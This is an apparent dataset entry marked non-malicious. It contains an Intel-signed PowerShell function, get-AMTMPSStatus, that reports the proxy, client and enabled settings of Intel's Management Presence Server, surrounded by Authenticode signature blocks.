# NGLPeJwLYnFLBSgW0x8bVs9wv8pBHL2TK6Pe23xtA/0uCwDBh6P5fC2xQb1j36fF
# n4yH74aFvokpslhV4n1kKIE8LqhplPRpGriSZ+s07DcVOeLDZ8jRV5RkN3/8myyj
# 76R5HSgyZastSefkWLKhdgv1pa1yD8l6NbtcI69W0Viwz4WdjgqLTwtASbKYSOWt
# Sz0xycvyKPGMldl/P7yrDnTw5N916Uubpcaa2OOV/GP1RGATQZoGg3+zPuKYYn2C
# EPlS/wpUPG/n2c5x80jT3Rlh8SXd7wZxaZ9KVgMTavWz6I0tYfwtNUTabE9ovWkx
# ggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv
# bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0
# aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAA
# Aecujy+TC08b6QABAAAB5zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkD
# MQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCC1oqCstwWBN1osxTxT1iA/
# cGjn2QMGA7GG78m4eYBaWTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIOU2
# XQ12aob9DeDFXM9UFHeEX74Fv0ABvQMG7qC51nOtMIGYMIGApH4wfDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0
# IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHnLo8vkwtPG+kAAQAAAecwIgQgfk7y
# L/Fg+qwMxB83yRNFNNOGBa29IheaFT2QvafHnF0wDQYJKoZIhvcNAQELBQAEggIA
# P84D880DCqWtUg8ny5TJJBuCW2eisPcI6hKb175ZBvgFZusVkVnqPtfMLpDY9g29
# sl9aTwp415aJbPI5HDeAi5rJ8tuxZU8HIkuTv9kXo6SgzMy7y1dSzapjM6BtEs3P
# E9dP64IdjxprKhqyikXjl/EbD8jBKG5whXsgQQF/cZiO/P86ieYGkVPNmN/ikaN8
# SJerx6+NNtQt7QQqyebR/qvKev4TwQu0GfH5JdzFvjhN2/yEVwhFAQUDR3DeqZFa
# +mFurmAo8hHeGMjVF9Y9Kee1F8YW3PLQXT18Re8Oe8rvUzj9j2tX3YR6tlq23o8H
# ySdNWTVvftWOfVr86oOEyYWgaQebKOHLvrCBE3HbsNSxLAyHjUleEowaaMZfOmQq
# guw6Y2Ii0Dv3sM2yu+j9Rvbenw+JZN2r5cbxGCWCPIAP2HjKPsV6r9/e45x9gKVG
# RbMujdRHMqPJu9FDAbgFD6s68TfOgW+tlazlSNlXJCm+xC7zzkrc2YG+zU3vDS8T
# uSMArHiE1wpRuzgU0fsgin2qdDlbBkrEHHsUmJ//6D5KwufZ9HBL3THpIItPttYe
# JqXFdgouxUKw0gJi9kw9vq/eJJXIMfkih4+V6zmSaYUpYYrf8My5c4G9FQL5je+x
# XLlxmuW7h+Ed3ucs9OR7Oe+kBKpx7hcq0/tTYzkWRKY=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_40_7.ps1
|
sample_40_7.ps1
|
# Copyright (C) Intel Corporation, 2007 - 2019 All Rights Reserved.
Function get-AMTMPSStatus {
<#
.Synopsis
Returns the status of the Intel Fast Call for Help Management Presence Server (MPS) interface settings
.Description
Returns the status of the Intel Fast Call for Help Management Presence Server (MPS) interface settings
.Notes
.Link
http:\\vproexpert.com
http:\\www.intel.com\vpro
http:\\www.intel.com
.Example
get-AMTMPSStatus
HTTPProxy SOCKSProxy Client Enabled
--------- ---------- ------ -------
HTTP Proxy address SOCKS Proxy address True
#>
[CmdletBinding()]
Param ()
Process {
[System.Reflection.Assembly]::LoadWithPartialName("Intel.Management.Wsman")
$mps = new-object Intel.Management.Wsman.MpsManager
$Results = @()
foreach($Hostname in $mps.hosts)
{
$Obj = new-object psobject
$Obj | Add-Member -MemberType noteproperty -Name HTTPProxy -value $mps.HttpProxy
$Obj | Add-Member -MemberType noteproperty -Name SOCKSProxy -value $mps.SocksProxy
$Obj | Add-Member -MemberType noteproperty -Name Client -value $Hostname
$Obj | Add-Member -MemberType noteproperty -Name Enabled -value $mps.Enabled
$Results += $Obj
}
if($mps.hosts.count -eq 0)
{
$Obj = new-object psobject
$Obj | Add-Member -MemberType noteproperty -Name HTTPProxy -value $mps.HttpProxy
$Obj | Add-Member -MemberType noteproperty -Name SOCKSProxy -value $mps.SocksProxy
$Obj | Add-Member -MemberType noteproperty -Name Client -value ""
$Obj | Add-Member -MemberType noteproperty -Name Enabled -value $mps.Enabled
$Results += $Obj
}
Write-Output $Results
}
}
# SIG # Begin signature block
# MIIo1wYJKoZIhvcNAQcCoIIoyDCCKMQCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCChA0UT4tceiQOs
# NOtkbzPwEmU5xu0Fs50xQgRviyoVuKCCEe8wggWIMIIEcKADAgECAhAK3oEU12eb
# Bm8tst/S9nrCMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAkdCMRswGQYDVQQI
# ExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoT
# D1NlY3RpZ28gTGltaXRlZDEkMCIGA1UEAxMbU2VjdGlnbyBSU0EgQ29kZSBTaWdu
# aW5nIENBMB4XDTIxMDQwNTAwMDAwMFoXDTIzMDQwNTIzNTk1OVowcDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFDASBgNVBAcMC1NhbnRhIENsYXJh
# MRowGAYDVQQKDBFJbnRlbCBDb3Jwb3JhdGlvbjEaMBgGA1UEAwwRSW50ZWwgQ29y
# cG9yYXRpb24wggGiMA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQDjUVXd0eS2
# a1cJleh4bp6C5ngpid1fyZl3x1O7UH31slBxqjtjD45nsKBbDATVW/ZH0zqbLQ0P
# pQLpLbBVHEFasianjtLSjFXs1pJJ14rfuZCyiOaFFCGYqb/fLQ2ZBq/0riDFgwfC
# YS80SIV7V+hq+XJhpsUms/5QPqRilRnk+OPlbikQktkUVWi1qN7pkjkC5NgTDLnz
# oxGP3OYA6x+ac3/NMQYnRXzbjACLUq70L2hDC8sDwaCQXavaUG29FF4MjwE8MzMx
# DqcjpZmaO/jbTpExgMBfkDa+vqWSb99gdAeJI/JZXAeuYgGQ+66aIhwmRGsqQIXT
# z4ofo+mRQMgSXatXEOtuBrC5q5GZUnWTTrdfnkdxg0oD9CsttmZg6Fhu5mTLYbJ+
# lKrV/JtSjKNgtQdYXCtnV5FRRzlqcjXqsXG+Q1YaY/n0lTEwCAqJyRMyJLuK/S/U
# MUfPw9BvDQbpyB3ARSD4FJ3glwv9UDKd/BmQ2SVGpS+3/7whm633YIMCAwEAAaOC
# AZAwggGMMB8GA1UdIwQYMBaAFA7hOqhTOjHVir7Bu61nGgOFrTQOMB0GA1UdDgQW
# BBS5qxx6xBgtLKbRn3jrB6dtnHz6VDAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/
# BAIwADATBgNVHSUEDDAKBggrBgEFBQcDAzARBglghkgBhvhCAQEEBAMCBBAwSgYD
# VR0gBEMwQTA1BgwrBgEEAbIxAQIBAwIwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9z
# ZWN0aWdvLmNvbS9DUFMwCAYGZ4EMAQQBMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6
# Ly9jcmwuc2VjdGlnby5jb20vU2VjdGlnb1JTQUNvZGVTaWduaW5nQ0EuY3JsMHMG
# CCsGAQUFBwEBBGcwZTA+BggrBgEFBQcwAoYyaHR0cDovL2NydC5zZWN0aWdvLmNv
# bS9TZWN0aWdvUlNBQ29kZVNpZ25pbmdDQS5jcnQwIwYIKwYBBQUHMAGGF2h0dHA6
# Ly9vY3NwLnNlY3RpZ28uY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBAdvRj4EEZ88QF
# gAGQZABeZB6XbzWNZaFrDGmZMTqREok2QqB6QxdyPSsAFEL5mVfwnD5f8F8iHx+W
# aZXjKHbSvn1f1CAMFMc/i7Byrr984Obp2raebwFNRUO7l2lewLCgkRBlb3+W7Hud
# eTGoTzhJL/Qcvy1jLT0VmhLJbvYjEpBuQ62z7MQH7HltsfjRnDu1RpqKsYWJuCt6
# tOSNn7MZ8vb5nsZEIqRoonucy4Yp1ItP/uXuLc4KcdLh+TzNUiXWWK6qQ6TqeeJp
# Z34IjoS1FvjXLV4ACypUuUvmEIq691NseI4ByVHCZyMa59A6Scpp+kadDUEw0LZj
# t9LGvtWIMIIF9TCCA92gAwIBAgIQHaJIMG+bJhjQguCWfTPTajANBgkqhkiG9w0B
# AQwFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNV
# BAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx
# LjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw
# HhcNMTgxMTAyMDAwMDAwWhcNMzAxMjMxMjM1OTU5WjB8MQswCQYDVQQGEwJHQjEb
# MBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRgw
# FgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJDAiBgNVBAMTG1NlY3RpZ28gUlNBIENv
# ZGUgU2lnbmluZyBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAIYi
# jTKFehifSfCWL2MIHi3cfJ8Uz+MmtiVmKUCGVEZ0MWLFEO2yhyemmcuVMMBW9aR1
# xqkOUGKlUZEQauBLYq798PgYrKf/7i4zIPoMGYmobHutAMNhodxpZW0fbieW15dR
# hqb0J+V8aouVHltg1X7XFpKcAC9o95ftanK+ODtj3o+/bkxBXRIgCFnoOc2P0tbP
# BrRXBbZOoT5Xax+YvMRi1hsLjcdmG0qfnYHEckC14l/vC0X/o84Xpi1VsLewvFRq
# nbyNVlPG8Lp5UEks9wO5/i9lNfIi6iwHr0bZ+UYc3Ix8cSjz/qfGFN1VkW6KEQ3f
# BiSVfQ+noXw62oY1YdMCAwEAAaOCAWQwggFgMB8GA1UdIwQYMBaAFFN5v1qqK0rP
# VIDh2JvAnfKyA2bLMB0GA1UdDgQWBBQO4TqoUzox1Yq+wbutZxoDha00DjAOBgNV
# HQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHSUEFjAUBggrBgEF
# BQcDAwYIKwYBBQUHAwgwEQYDVR0gBAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBD
# oEGGP2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZp
# Y2F0aW9uQXV0aG9yaXR5LmNybDB2BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKG
# M2h0dHA6Ly9jcnQudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENB
# LmNydDAlBggrBgEFBQcwAYYZaHR0cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkq
# hkiG9w0BAQwFAAOCAgEATWNQ7Uc0SmGk295qKoyb8QAAHh1iezrXMsL2s+Bjs/th
# AIiaG20QBwRPvrjqiXgi6w9G7PNGXkBGiRL0C3danCpBOvzW9Ovn9xWVM8Ohgyi3
# 3i/klPeFM4MtSkBIv5rCT0qxjyT0s4E307dksKYjalloUkJf/wTr4XRleQj1qZPe
# a3FAmZa6ePG5yOLDCBaxq2NayBWAbXReSnV+pbjDbLXP30p5h1zHQE1jNfYw08+1
# Cg4LBH+gS667o6XQhACTPlNdNKUANWlsvp8gJRANGftQkGG+OY96jk32nw4e/gdR
# EmaDJhlIlc5KycF/8zoFm/lv34h/wCOe0h5DekUxwZxNqfBZslkZ6GqNKQQCd3xL
# S81wvjqyVVp4Pry7bwMQJXcVNIr5NsxDkuS6T/FikyglVyn7URnHoSVAaoRXxrKd
# sbwcCtp8Z359LukoTBh+xHsxQXGaSynsCz1XUNLK3f2eBVHlRHjdAd6xdZgNVCT9
# 8E7j4viDvXK6yz067vBeF5Jobchh+abxKgoLpbn0nu6YMgWFnuv5gynTxix9vTp3
# Los3QqBqgu07SqqUEKThDfgXxbZaeTMYkuO1dfih6Y4KJR7kHvGfWocj/5+kUZ77
# OYARzdu1xKeogG/lU9Tg46LC0lsa+jImLWpXcBw8pFguo/NbSwfcMlnzh6cabVgw
# ggZmMIIETqADAgECAhMzAAAARLc//O9az6J6AAAAAABEMA0GCSqGSIb3DQEBBQUA
# MH8xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKTAnBgNVBAMT
# IE1pY3Jvc29mdCBDb2RlIFZlcmlmaWNhdGlvbiBSb290MB4XDTE1MDcyMjIxMDM0
# OVoXDTI1MDcyMjIxMDM0OVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcg
# SmVyc2V5MRQwEgYDVQQHEwtKZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJU
# UlVTVCBOZXR3b3JrMS4wLAYDVQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRp
# b24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJl
# FzYOw9sIs9CsVw127c0n00ytUINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezco
# EStH2jnGvDoZtF+mvX2do2NCtnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+j
# BvGIGGqQIjy8/hPwhxR79uQfjtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWm
# p2bIcmfbIWax1Jt4A8BQOujM8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2u
# TIq3XJq0tyA9yn8iNK5+O2hmAUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnH
# a4xgk97Exwzf4TKuzJM7UXiVZ4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWax
# KXwyhGNVicQNwZNUMBkTrNN9N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjN
# hLixP6Q5D9kCnusSTJV882sFqV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81
# VXQJSdhJWBp/kjbmUZIO8yZ9HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10
# Yy+xUGUJ5lhCLkMaTLTwJUdZ+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrW
# X1Uu6lzGKAgEJTm4Diup8kyXHAc/DVL17e8vgg8CAwEAAaOB0DCBzTATBgNVHSUE
# DDAKBggrBgEFBQcDAzASBgNVHRMBAf8ECDAGAQH/AgECMB0GA1UdDgQWBBRTeb9a
# qitKz1SA4dibwJ3ysgNmyzALBgNVHQ8EBAMCAYYwHwYDVR0jBBgwFoAUYvsKIVt/
# Q24R2glUUGv10pZx8Z4wVQYDVR0fBE4wTDBKoEigRoZEaHR0cDovL2NybC5taWNy
# b3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljcm9zb2Z0Q29kZVZlcmlmUm9v
# dC5jcmwwDQYJKoZIhvcNAQEFBQADggIBAGsikzw9OVRxZGsO8uQ8MBHFIEpLhg+S
# 8f8zeTrZ5JinDkCgIoB+YbLgpxnPJpUxKmXUak8xhurAxi7FZIw9SFnNCy90PZQm
# ExBC1JeYJ148dtJ4aR0aZOcFcnXg62ZAQ5+PDEb/l2CmyGetEAibYqbpvjqK0wdN
# n3KTJbwGEeAskDg+Zxz9GdeekM49wuDnYazA5QT1HplUDJENAVZxN64n1J5DIqXJ
# J81N5XESOSSlQVaH/7xVFA8lyonux5fl0hP/PX4aoI8/yCzXo3DQx2DA/Ng+UeeX
# xj477c94vorK48Typ6ftnq4IAo+gUttyHtU7w02fjvqbcMf4479sP5Kb5Dc+7GqM
# KfnBor+LPhppZvscY08mAckCxD7S/8NDqBv9mfrUvKW54pMvOwHF0fQ6L2jD4GS3
# WpVeRswHg2m7PAWSVnM1c0WYTnzYEqW3QumiY/ZCYBhw0TtvMcCHx+Zx4fNGFun1
# uHKz6W0fYiZJo0mL3WjHi2hW9978+ockuAOBF4/l8WdqHa7TdPeMpV2zC45CKZbO
# ScR3fmZ8ARcabBQkw7AXdwXYGkC3hmvY5HtArH7fTm8k+SCAgowz5+X6Kdid2otw
# XSvJHYJMC2fLhEGe5wZ+EYNELYoZ7vR/mt15HDcZHp8/jCm6DVwQhjdsSM1FXc1w
# vLzRTV3Yxbh2MYIWPjCCFjoCAQEwgZAwfDELMAkGA1UEBhMCR0IxGzAZBgNVBAgT
# EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMP
# U2VjdGlnbyBMaW1pdGVkMSQwIgYDVQQDExtTZWN0aWdvIFJTQSBDb2RlIFNpZ25p
# bmcgQ0ECEAregRTXZ5sGby2y39L2esIwDQYJYIZIAWUDBAIBBQCgfDAQBgorBgEE
# AYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3
# AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgwSnwuE2YlK3mnj6h
# sf8mu2ShSRf4cS9hCCo385mup/UwDQYJKoZIhvcNAQEBBQAEggGAqR9hxwPsp13n
# 4pGES47AwvH+fNnJRw6GtglqEid17t0Ku4lmrL3QciP28TEnnq/rO8kEvk4sYQ5X
# hVamGtYCbBypR0j4ZQmnbI8nL2VVZq9YEQFxajDYu3S1lOFFIkTUYr4Cd3Nbz0Eb
# D07YXsQP9FfieXuTmlE+8b0+AOJ0kTHV6fPgIy8OoalETlkoB7KTt7fOI5PWmOqM
# JMjZ5eX5+lCALb/bm9HASLRMf3uABHKkwUSoYZ+XY8yd6tHJI17hLZaWlMFqgFJw
# cup8jqtuqs+ORInaMsR0ezqL3S4e3w1V9bHvouBGjvu54a2PUIS+xaFtGT1/L+KG
# oauP2RFV+XDjy4ixpAhSjGxJGtu2iGy4E+N02EqCJAhNTIoNYs856o3/zP0BVvyz
# 78nK32i7Vp8E4ZGHyAQi+4u3uOE37u2JUbCPMbjr7oRA53oUehepXLu1JoQ8VIzH
# GzCRLo6PMqjpienLjI2X7CnGi+1w3zOSF+BvJeI7u6cmoY/rpWEvoYITgDCCE3wG
# CisGAQQBgjcDAwExghNsMIITaAYJKoZIhvcNAQcCoIITWTCCE1UCAQMxDzANBglg
# hkgBZQMEAgIFADCCAQ0GCyqGSIb3DQEJEAEEoIH9BIH6MIH3AgEBBgorBgEEAbIx
# AgEBMDEwDQYJYIZIAWUDBAIBBQAEILsB9xbG55uAU2ygboWW6NmVWnuYShL9AdjI
# I62nrczLAhUAgDzoVK43DpkEOtcsvOzUtfRqAioYDzIwMjExMDI3MTIxMTAwWqCB
# iqSBhzCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3Rl
# cjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSww
# KgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25lciAjMqCCDfsw
# ggcHMIIE76ADAgECAhEAjHegAI/00bDGPZ86SIONazANBgkqhkiG9w0BAQwFADB9
# MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD
# VQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMT
# HFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwHhcNMjAxMDIzMDAwMDAwWhcN
# MzIwMTIyMjM1OTU5WjCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIg
# TWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBM
# aW1pdGVkMSwwKgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25l
# ciAjMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJGHSyyLwfEeoJ7T
# B8YBylKwvnl5XQlmBi0vNX27wPsn2kJqWRslTOrvQNaafjLIaoF9tFw+VhCBNToi
# Noz7+CAph6x00BtivD9khwJf78WA7wYc3F5Ok4e4mt5MB06FzHDFDXvsw9njl+nL
# GdtWRWzuSyBsyT5s/fCb8Sj4kZmq/FrBmoIgOrfv59a4JUnCORuHgTnLw7c6zZ9Q
# BB8amaSAAk0dBahV021SgIPmbkilX8GJWGCK7/GszYdjGI50y4SHQWljgbz2H6p8
# 18FBzq2rdosggNQtlQeNx/ULFx6a5daZaVHHTqadKW/neZMNMmNTrszGKYogwWDG
# 8gIsxPnIIt/5J4Khg1HCvMmCGiGEspe81K9EHJaCIpUqhVSu8f0+SXR0/I6uP6Vy
# 9MNaAapQpYt2lRtm6+/a35Qu2RrrTCd9TAX3+CNdxFfIJgV6/IEjX1QJOCpi1arK
# 3+3PU6sf9kSc1ZlZxVZkW/eOUg9m/Jg/RAYTZG7p4RVgUKWx7M+46MkLvsWE990K
# ndq8KWw9Vu2/eGe2W8heFBy5r4Qtd6L3OZU3b05/HMY8BNYxxX7vPehRfnGtJHQb
# LNz5fKrvwnZJaGLVi/UD3759jg82dUZbk3bEg+6CviyuNxLxvFbD5K1Dw7dmll6U
# Mvqg9quJUPrOoPMIgRrRRKfM97gxAgMBAAGjggF4MIIBdDAfBgNVHSMEGDAWgBQa
# ofhhGSAPw0F3RSiO0TVfBhIEVTAdBgNVHQ4EFgQUaXU3e7udNUJOv1fTmtufAdGu
# 3tAwDgYDVR0PAQH/BAQDAgbAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYI
# KwYBBQUHAwgwQAYDVR0gBDkwNzA1BgwrBgEEAbIxAQIBAwgwJTAjBggrBgEFBQcC
# ARYXaHR0cHM6Ly9zZWN0aWdvLmNvbS9DUFMwRAYDVR0fBD0wOzA5oDegNYYzaHR0
# cDovL2NybC5zZWN0aWdvLmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3Js
# MHQGCCsGAQUFBwEBBGgwZjA/BggrBgEFBQcwAoYzaHR0cDovL2NydC5zZWN0aWdv
# LmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3J0MCMGCCsGAQUFBzABhhdo
# dHRwOi8vb2NzcC5zZWN0aWdvLmNvbTANBgkqhkiG9w0BAQwFAAOCAgEASgN4kEIz
# 7Hsagwk2M5hVu51ABjBrRWrxlA4ZUP9bJV474TnEW7rplZA3N73f+2Ts5YK3lcxX
# VXBLTvSoh90ihaZXu7ghJ9SgKjGUigchnoq9pxr1AhXLRFCZjOw+ugN3poICkMIu
# k6m+ITR1Y7ngLQ/PATfLjaL6uFqarqF6nhOTGVWPCZAu3+qIFxbradbhJb1FCJeA
# 11QgKE/Ke7OzpdIAsGA0ZcTjxcOl5LqFqnpp23WkPnlomjaLQ6421GFyPA6FYg2g
# XnDbZC8Bx8GhxySUo7I8brJeotD6qNG4JRwW5sDVf2gaxGUpNSotiLzqrnTWgufA
# iLjhT3jwXMrAQFzCn9UyHCzaPKw29wZSmqNAMBewKRaZyaq3iEn36AslM7U/ba+f
# XwpW3xKxw+7OkXfoIBPpXCTH6kQLSuYThBxN6w21uIagMKeLoZ+0LMzAFiPJkeVC
# A0uAzuRN5ioBPsBehaAkoRdA1dvb55gQpPHqGRuAVPpHieiYgal1wA7f0GiUeaGg
# no62t0Jmy9nZay9N2N4+Mh4g5OycTUKNncczmYI3RNQmKSZAjngvue76L/Hxj/5Q
# uHjdFJbeHA5wsCqFarFsaOkq5BArbiH903ydN+QqBtbD8ddo408HeYEIE/6yZF7p
# sTzm0Hgjsgks4iZivzupl1HMx0QygbKvz98wggbsMIIE1KADAgECAhAwD2+s3WaY
# dHypRjaneC25MA0GCSqGSIb3DQEBDAUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoTFVRo
# ZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBDZXJ0
# aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xOTA1MDIwMDAwMDBaFw0zODAxMTgyMzU5
# NTlaMH0xCzAJBgNVBAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIx
# EDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoTD1NlY3RpZ28gTGltaXRlZDElMCMG
# A1UEAxMcU2VjdGlnbyBSU0EgVGltZSBTdGFtcGluZyBDQTCCAiIwDQYJKoZIhvcN
# AQEBBQADggIPADCCAgoCggIBAMgbAa/ZLH6ImX0BmD8gkL2cgCFUk7nPoD5T77Na
# wHbWGgSlzkeDtevEzEk0y/NFZbn5p2QWJgn71TJSeS7JY8ITm7aGPwEFkmZvIavV
# cRB5h/RGKs3EWsnb111JTXJWD9zJ41OYOioe/M5YSdO/8zm7uaQjQqzQFcN/nqJc
# 1zjxFrJw06PE37PFcqwuCnf8DZRSt/wflXMkPQEovA8NT7ORAY5unSd1VdEXOzQh
# e5cBlK9/gM/REQpXhMl/VuC9RpyCvpSdv7QgsGB+uE31DT/b0OqFjIpWcdEtlEzI
# jDzTFKKcvSb/01Mgx2Bpm1gKVPQF5/0xrPnIhRfHuCkZpCkvRuPd25Ffnz82Pg4w
# ZytGtzWvlr7aTGDMqLufDRTUGMQwmHSCIc9iVrUhcxIe/arKCFiHd6QV6xlV/9A5
# VC0m7kUaOm/N14Tw1/AoxU9kgwLU++Le8bwCKPRt2ieKBtKWh97oaw7wW33pdmmT
# IBxKlyx3GSuTlZicl57rjsF4VsZEJd8GEpoGLZ8DXv2DolNnyrH6jaFkyYiSWcuo
# RsDJ8qb/fVfbEnb6ikEk1Bv8cqUUotStQxykSYtBORQDHin6G6UirqXDTYLQjdpr
# t9v3GEBXc/Bxo/tKfUU2wfeNgvq5yQ1TgH36tjlYMu9vGFCJ10+dM70atZ2h3pVB
# eqeDAgMBAAGjggFaMIIBVjAfBgNVHSMEGDAWgBRTeb9aqitKz1SA4dibwJ3ysgNm
# yzAdBgNVHQ4EFgQUGqH4YRkgD8NBd0UojtE1XwYSBFUwDgYDVR0PAQH/BAQDAgGG
# MBIGA1UdEwEB/wQIMAYBAf8CAQAwEwYDVR0lBAwwCgYIKwYBBQUHAwgwEQYDVR0g
# BAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBDoEGGP2h0dHA6Ly9jcmwudXNlcnRy
# dXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZpY2F0aW9uQXV0aG9yaXR5LmNybDB2
# BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKGM2h0dHA6Ly9jcnQudXNlcnRydXN0
# LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENBLmNydDAlBggrBgEFBQcwAYYZaHR0
# cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkqhkiG9w0BAQwFAAOCAgEAbVSBpTNd
# FuG1U4GRdd8DejILLSWEEbKw2yp9KgX1vDsn9FqguUlZkClsYcu1UNviffmfAO9A
# w63T4uRW+VhBz/FC5RB9/7B0H4/GXAn5M17qoBwmWFzztBEP1dXD4rzVWHi/SHbh
# RGdtj7BDEA+N5Pk4Yr8TAcWFo0zFzLJTMJWk1vSWVgi4zVx/AZa+clJqO0I3fBZ4
# OZOTlJux3LJtQW1nzclvkD1/RXLBGyPWwlWEZuSzxWYG9vPWS16toytCiiGS/qhv
# WiVwYoFzY16gu9jc10rTPa+DBjgSHSSHLeT8AtY+dwS8BDa153fLnC6NIxi5o8JH
# HfBd1qFzVwVomqfJN2Udvuq82EKDQwWli6YJ/9GhlKZOqj0J9QVst9JkWtgqIsJL
# nfE5XkzeSD2bNJaaCV+O/fexUpHOP4n2HKG1qXUfcb9bQ11lPVCBbqvw0NP8srMf
# tpmWJvQ8eYtcZMzN7iea5aDADHKHwW5NWtMe6vBE5jJvHOsXTpTDeGUgOw9Bqh/p
# oUGd/rG4oGUqNODeqPk85sEwu8CgYyz8XBYAqNDEf+oRnR4GxqZtMl20OAkrSQeq
# /eww2vGnL8+3/frQo4TZJ577AWZ3uVYQ4SBuxq6x+ba6yDVdM3aO8XwgDCp3rrWi
# Aoa6Ke60WgCxjKvj+QrJVF3UuWp0nr1IrpgxggQtMIIEKQIBATCBkjB9MQswCQYD
